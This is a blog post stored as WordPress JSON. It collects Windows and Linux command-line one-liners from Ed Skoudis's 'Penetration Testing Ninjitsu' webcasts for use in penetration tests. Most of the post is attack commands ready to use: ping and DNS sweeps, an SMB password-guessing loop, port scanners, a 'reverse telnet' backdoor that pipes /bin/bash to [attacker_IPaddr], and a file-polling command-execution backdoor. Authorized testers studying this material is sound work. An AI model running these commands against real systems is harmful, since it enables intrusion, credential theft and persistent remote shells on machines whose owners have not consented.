{"id":82,"date":"2008-12-02T12:08:37","date_gmt":"2008-12-02T18:08:37","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?p=82"},"modified":"2018-12-28T20:06:26","modified_gmt":"2018-12-29T02:06:26","slug":"penetration-testing-ninjitsu","status":"publish","type":"post","link":"https:\/\/www.jedge.com\/wordpress\/2008\/12\/penetration-testing-ninjitsu\/","title":{"rendered":"Penetration Testing Ninjitsu"},"content":{"rendered":"<p>Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (<a href=\"http:\/\/www.coresecurity.com\/content\/webcast-series-with-sans\">http:\/\/www.coresecurity.com\/content\/webcast-series-with-sans<\/a>).\u00a0 I highly recommend listening to these web casts and downloading the slides for your reference.\u00a0 I&#8217;m including the commands extracted from the slides that can be very useful for a penetration test.<\/p>\n<p>NOTE: 12\/2018 &#8211; Link to the webcast no longer works. The Internet Archive has the <a target=\"_blank\" href=\"https:\/\/web.archive.org\/web\/20160322202451\/http:\/\/www.coresecurity.com\/files\/attachments\/Core_Define_and_Win_Cmd_Line.pdf\">slides as a PDF<\/a>. I&#8217;ve downloaded it and host it <a target=\"_blank\" href=\"http:\/\/www.jedge.com\/docs\/Core_Define_and_Win_Cmd_Line.pdf\">here<\/a> as well.<br \/>\n<!--more--><br \/>\nNinjitsu I<\/p>\n<p>Ping Sweep<br \/>\n<kbd>C:\\&gt; for \/L %i in (1,1,255) do @ping \u2013n 1 10.10.10.%i | find \u201cReply\u201d<\/kbd><\/p>\n<p>Reverse DNS Lookup<br \/>\n<kbd>C:\\&gt; for \/L %i in (1,1,255) do @nslookup 10.10.10.%i 2&gt;nul | find \"Name\" &amp;&amp; echo 10.10.10.%i<\/kbd><\/p>\n<p>Dictionary Attack<br \/>\n<kbd>C:\\&gt; for \/f %i in (user.txt) do @(for \/f %j in (pass.txt) do @echo %i:%j &amp; @net use <a href=\"file:\/\/\\\\10.10.10.10\">\\\\10.10.10.10<\/a> %j \/u:%i 2&gt;nul &amp;&amp; echo %i:%j &gt;&gt; success.txt &amp;&amp; net use <a href=\"file:\/\/\\\\10.10.10.10\">\\\\10.10.10.10<\/a> \/del)<\/kbd><\/p>\n<p>Ninjitsu II<\/p>\n<p>Linux Command-Line Port Scanner<br \/>\n<kbd>$ port=1; while [ $port \u2013lt 1024 ]; do echo &gt; \/dev\/tcp\/[IPaddr]\/$port; [ $? == 0 ] &amp;&amp; echo $port \"is open\" &gt;&gt; \/tmp\/ports.txt; port=`expr $port + 1`; done<\/kbd><\/p>\n<p>Linux Command-Line Backdoor via \u201cReverse Telnet\u201d<br \/>\n<kbd>$ telnet [attacker_IPaddr] [port1] | \/bin\/bash | telnet [attacker_IPaddr] [port2]<\/kbd><\/p>\n<p>The Windows Command Line Port Scanner Using FTP Client<br \/>\n<kbd>C:\\&gt; for \/L %i in (1,1,1024) do echo Checking Port %i: &gt;&gt; ports.txt &amp; echo open [IP_addr] %i &gt; ftp.txt &amp; echo quit &gt;&gt; ftp.txt &amp; ftp -s:ftp.txt 2&gt;&gt;ports.txt<\/kbd><\/p>\n<p>Windows Command-Line File Transfer<br \/>\n<kbd>C:\\&gt; type [filename] &gt; \\\\[machine]\\[share]\\[filename]<\/kbd><\/p>\n<p>Backdoors: The File Shell<br \/>\n<kbd>C:\\&gt; for \/L %i in (1,0,2) do (for \/f \"delims=^\" %j in (commands.txt) do cmd.exe \/c %j &gt;&gt; output.txt &amp; del commands.txt) &amp; ping -n 2 127.0.0.1<\/kbd><\/p>\n<p>Ninjitsu III<\/p>\n<p>Wireless Sniffing<br \/>\n<kbd>C:\\> for \/L %i in (1,0,2) do @(netsh interface set interface \u201cwireless network connection\u201d disable & ping \u2013n 3 127.0.0.1 >nul & netsh interface set interface \u201cwireless network connection\u201d enable & ping \u2013n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)<\/kbd><\/p>\n<p>Install Telnet Client Vista<br \/>\n<kbd>C:\\> pkgmgr \/iu:\"TelnetClient\"<\/kbd><\/p>\n<p>Install Telnet Server Vista<br \/>\n<kbd>C:\\> pkgmgr \/iu:\"TelnetServer\"<\/kbd><\/p>\n<p>Install IIS 7.0<br \/>\n<kbd>C:\\> pkgmgr \/iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI<\/kbd><\/p>\n<p>List Domain Password Settings<br \/>\n<kbd>C:\\>net accounts \/domain<\/kbd><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http:\/\/www.coresecurity.com\/content\/webcast-series-with-sans).\u00a0 I highly recommend listening to these web casts and downloading the slides for your reference.\u00a0 I&#8217;m including the commands extracted from the slides that can be very useful for a penetration test. NOTE: 12\/2018 &#8211; Link to the webcast [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[5,6,7,10],"tags":[87,69,96,56,95,26],"class_list":["post-82","post","type-post","status-publish","format-standard","hentry","category-installing-using-tools","category-fyi","category-scripts","category-using-the-tools","tag-command","tag-command-line","tag-ed-skoudis","tag-penetration-testing","tag-sans","tag-windows"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/82","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=82"}],"version-history":[{"count":12,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/82\/revisions"}],"predecessor-version":[{"id":1188,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/82\/revisions\/1188"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/categories?post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/tags?post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}